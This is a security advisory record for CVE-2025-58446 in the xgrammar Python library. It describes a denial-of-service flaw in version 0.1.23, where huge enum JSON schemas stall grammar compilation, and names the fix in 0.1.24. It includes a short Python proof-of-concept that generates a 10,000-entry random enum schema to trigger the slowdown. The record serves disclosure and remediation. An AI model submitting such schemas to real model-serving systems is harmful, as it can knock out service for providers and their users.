---
id: CVE-2025-58446
aliases:
  - GHSA-9q5r-wfvf-rr7f
  - PYSEC-2026-2055
title: xgrammar vulnerable to denial of service by huge enum grammar
summary: xgrammar vulnerable to denial of service by huge enum grammar
severity: medium
vendor: xgrammar
product: xgrammar
ecosystem: pip
affected:
  - 'xgrammar >= 0.1.23, < 0.1.24'
patched:
  - xgrammar 0.1.24
published: '2025-09-05'
updated: '2026-09-10'
sourceUpdated: '2026-09-10T03:50:28.281780833Z'
source: OSV
sourceUrl: 'https://osv.dev/vulnerability/GHSA-9q5r-wfvf-rr7f'
references:
  - url: 'https://github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f'
  - url: 'https://nvd.nist.gov/vuln/detail/CVE-2025-58446'
  - url: >-
      https://github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27
  - url: 'https://github.com/mlc-ai/xgrammar'
tags:
  - osv
  - pip
epss: 0.00535
epssPercentile: 0.42676
ingestedAt: '2026-07-08T18:25:48.068Z'
---

## Overview

### Summary
Provided grammar, would fit in a context window of most of the models, but takes minutes to process in 0.1.23. In testing with 0.1.16 the parser worked fine so this seems to be a regression caused by Earley parser.

### Details

Full reproducer provider in the POC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models I checked) was significantly longer than LLM processing itself, meaning this can be used to DOS model providers.

### Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the below one. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disable some slow optimization for large grammars. 

Thanks to @Seven-Streams 

### PoC
```
import string
import random

def enum_schema(size=10000,str_len=10):
    enum =  {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len)) for _ in range(size)]}
    schema = {
        "definitions": {
            "colorEnum": enum
        },
        "type": "object",
        "properties": {
            "color1": {
                "$ref": "#/definitions/colorEnum"
            },
            "color2": {
                "$ref": "#/definitions/colorEnum"
            },
            "color3": {
                "$ref": "#/definitions/colorEnum"
            },
            "color4": {
                "$ref": "#/definitions/colorEnum"
            },
            "color5": {
                "$ref": "#/definitions/colorEnum"
            },
            "color6": {
                "$ref": "#/definitions/colorEnum"
            },
            "color7": {
                "$ref": "#/definitions/colorEnum"
            },
            "color8": {
                "$ref": "#/definitions/colorEnum"
            }
        },
        "required": [
                "color1",
                "color2"
         ]
    }
    return schema

schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```

where:
```
def test_schema(schema, instance):
    grammar = xgr.Grammar.from_json_schema(
        json.dumps(schema),
        strict_mode=True
    )
    return _is_grammar_accept_string(grammar, json.dumps(instance))
```

### Impact
DOS

## Affected packages

- `xgrammar >= 0.1.23, < 0.1.24`

## Remediation

Upgrade to a patched release:

- `xgrammar 0.1.24`
